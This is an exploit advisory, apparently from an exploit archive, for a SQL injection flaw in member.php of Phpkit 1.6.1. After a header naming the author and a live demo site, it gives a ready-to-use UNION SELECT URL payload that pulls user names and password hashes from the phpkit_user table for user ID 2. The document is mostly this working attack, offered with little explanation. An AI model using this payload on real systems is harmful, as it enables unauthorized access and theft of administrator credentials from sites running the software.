Text :  

# Exploit Title: Phpkit 1.6.1 SQL Injection member.php
# Date: 19.02.2010
# Author: Easy Laster
# Tested on: windows xp
# Demo : www.m-creutz.de /you must login
##########
##Phpkit 1.6.1 SQL Injection member.php ##
##########

#Script: Phpkit 1.6.1 SQL Injection member.php #
#Vulnerabilities [ SQL Injection ] #
#Language: [ PHP ] #
#Download: [ this script is for free] #
#Founder: [ ea$y laster ] #
#Peace to [ -tmh- ,0qwl ,Crypter ,Dr.ChAoS ,dremicz ,eddy14 ,HANNIBAL ] #
#[ Lidloses_Auge ,n00bor, Rip ,Sens0r ,-=Player=-] #
###########################################################################
##
/include.php?path=login/member.php&searchstr=+union+select+1,1,1,1,1,1,
#
concat(user_name,0x3a,user_pw),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,
#
1,1,1,1,1,1,1,1+from+phpkit_user+where+user_id=2#
#
###########################################################################
##

  References :  

None